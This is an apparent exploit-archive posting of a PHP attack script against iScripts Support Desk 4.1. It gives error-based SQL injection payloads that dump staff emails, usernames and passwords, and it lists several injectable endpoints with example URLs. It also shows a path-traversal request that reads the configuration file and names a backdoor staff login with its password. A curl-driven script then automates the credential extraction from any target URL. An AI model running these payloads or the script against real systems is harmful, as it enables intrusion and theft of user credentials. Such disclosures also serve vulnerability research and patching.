exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

iScripts Support Desk 4.1 SQL Injection

iScripts Support Desk 4.1 SQL Injection
Posted Dec 16, 2013
Authored by i-Hmx

iScripts Support Desk version 4.1 suffers from local file disclosure, PHP info disclosure, and remote SQL injection vulnerabilities.

tags | exploit, remote, local, php, vulnerability, sql injection
SHA-256 | ffcd1cb4640b8a69da7b59123a421f1bc5a47d487d99e0d730b4d3d634ddabf1

iScripts Support Desk 4.1 SQL Injection

Change Mirror Download
<?
/*
[+] iScripts Support desk version 4.1
[+] Sql Injection Exploit
[+] Vuln & Exploit By i-Hmx
[+] sec4ever.com , 1337s.cc

I.Sql Injection vulns

> Normal Sql
postticketbeforeregistersave.php
Staff table
post : txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from `information_schema`.tables where table_schema=database() limit 33,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S&notlogin=NOTLOGIN
Get staff
Post : txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,unhex(Hex(cast(sptbl_staffs.vMail as char))),0x5e,unhex(Hex(cast(sptbl_staffs.vLogin as char))),0x5e,unhex(Hex(cast(sptbl_staffs.vPassword as char))),0x27,0x7e) from sptbl_staffs limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S&notlogin=NOTLOGIN

> Blind
/onlinetest.php

$comp = $_GET["comp"];
include("./config/settings.php");
include("./includes/functions/dbfunctions.php");
$conn = getConnection();
$sql_img = "select vChatIcon from sptbl_companies where nCompId='".$comp."'";
$res_img = executeSelect($sql_img,$conn);
if ( mysql_num_rows($res_img) > 0 ) {
Exploit : /onlinetest.php?id=1


/client_prechat.php
Line 3 : if ($_POST["comp"] !='' ) $comp = $_POST["comp"];
Line 245 :
$sql_dpt = "SELECT d.nDeptId, d.vDeptDesc FROM sptbl_depts d INNER JOIN sptbl_companies c
ON ( d.nCompId = c.nCompId ) WHERE d.nCompId = '".$comp."' ORDER BY d.vDeptDesc";
$res_dpt = executeSelect($sql_dpt,$conn);

Exploit as : site.com/supportdesk/client_prechat.php
Post parameter : comp=%inject_here%

/getChatIcon_det.php
Line 2 : $comp = $_GET["comp"];
Line 39 :
$sql = "select s.nStaffId from sptbl_staffs s inner join sptbl_staffdept sd on ( s.nStaffId = sd.nStaffId ) inner join sptbl_depts d on ( sd.nDeptId = d.nDeptId ) where s.vOnline='1' and s.vDelStatus='0' and d.nCompId='".$comp."'";
$result = executeSelect($sql,$conn);
if ( mysql_num_rows($result) > 0 ) {
$img_src = "images/chat/chat-icon-".$img_id."-online.gif";
} else {
$img_src = "images/chat/chat-icon-".$img_id."-offline.gif";
}

Exploit as : site.com/supportdesk/getChatIcon_det.php?comp=1


/getChatUpdates.php
if ( $_SESSION['sess_userid'] == "" ) echo "##X";
//So to Exploit it u should be logged in as normal user
else {
$mod = isset( $_GET['mod']) ? $_GET['mod'] : '' ;
$chatid = isset( $_GET['chatid']) ? $_GET['chatid'] : '' ;
$conn = getConnection();
$sql = "Select tMatter from sptbl_chat where nChatId='".$chatid."'";
$result = executeSelect($sql,$conn);
$rowcnt_chatUpd = mysql_num_rows($result);
Exploit : Login then Inject here > site.com/supportdesk/getChatUpdates.php?comp=1
You'd better use ur session id at havij for injection

II.Local File Disclosure

admin/csvdownload.php
$filename="../csvfiles/".addslashes($_GET["id"]);
header('Content-Description: File Transfer');
header('Content-Type: application/force-download');
header('Content-Length: ' . filesize($filename));
header('Content-Disposition: attachment; filename=' . basename($filename));
readfile($filename);

Exploit as : admin/csvdownload.php?id=../config/settings.php

III.PHP Info disclosure
/phpinfo.php

IV.Back Door user
don't know if the nulled version only is backdoored or all versions
but backdoor staff member is installed as
user : staff
pass : staff


*/
if(!$argv[1])
{
echo "\n[+] usage : php ".$argv[0]." [Target]\nex : php ".$argv[0]." http://site.com/support/\n";
exit();
}
echo "[+] iScripts Support Desk Sql Injection Exploit \n";
echo "[-] Exploited By i-Hmx \n";
echo "[-] sec4ever.com , 1337s.cc\n";
function kastr($string, $start, $end){
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}
function faexploit($url,$inj){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url."postticketbeforeregistersave.php");
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl, CURLOPT_POSTFIELDS,$inj);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
$version=faexploit($argv[1],"txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select concat(0x66617273617779,0x3e3e,unhex(Hex(cast(version() as char))),0x3c3c)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S&notlogin=NOTLOGIN");
if(preg_match("/farsawy/",$version))
{
$ver=kastr($version,">>","<<");
echo "[-] Mysql Version : $ver\n";
$tbl=faexploit($argv[1],"txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select distinct concat(0x3e3e,unhex(Hex(cast(table_name as char))),0x3c3c) from `information_schema`.tables where table_schema=database() limit 33,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S&notlogin=NOTLOGIN");
$stf=kastr($tbl,">>","<<");
echo "[-] Staffs table name : $stf\n";
$numb=faexploit($argv[1],"txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select concat(0x3e3e,count(*),0x3c3c) from sptbl_staffs)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S&notlogin=NOTLOGIN");
$num=kastr($numb,">>","<<");
echo "[-] Number of staff members : $num\n";
echo "[-] Staffs data ordered as : Email : Username: Password\n";
for($f=0;$f<$num;$f++)
{
$data=faexploit($argv[1],"txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select concat(0x3e3e,unhex(Hex(cast(vMail as char))),0x3a,unhex(Hex(cast(vLogin as char))),0x3a,unhex(Hex(cast(vPassword as char))),0x3c3c) from $stf limit $f,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S&notlogin=NOTLOGIN");
$ok=kastr($data,">>","<<");
echo " $ok\n";
}
echo "[+] Done\n";
exit(" Greets From Faris ;)");
}

else
{
echo "[-] Target Not vulnerable\n";
echo "[+] Exit\n";
exit();
}
// 07/2011
// i-Hmx
?>
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close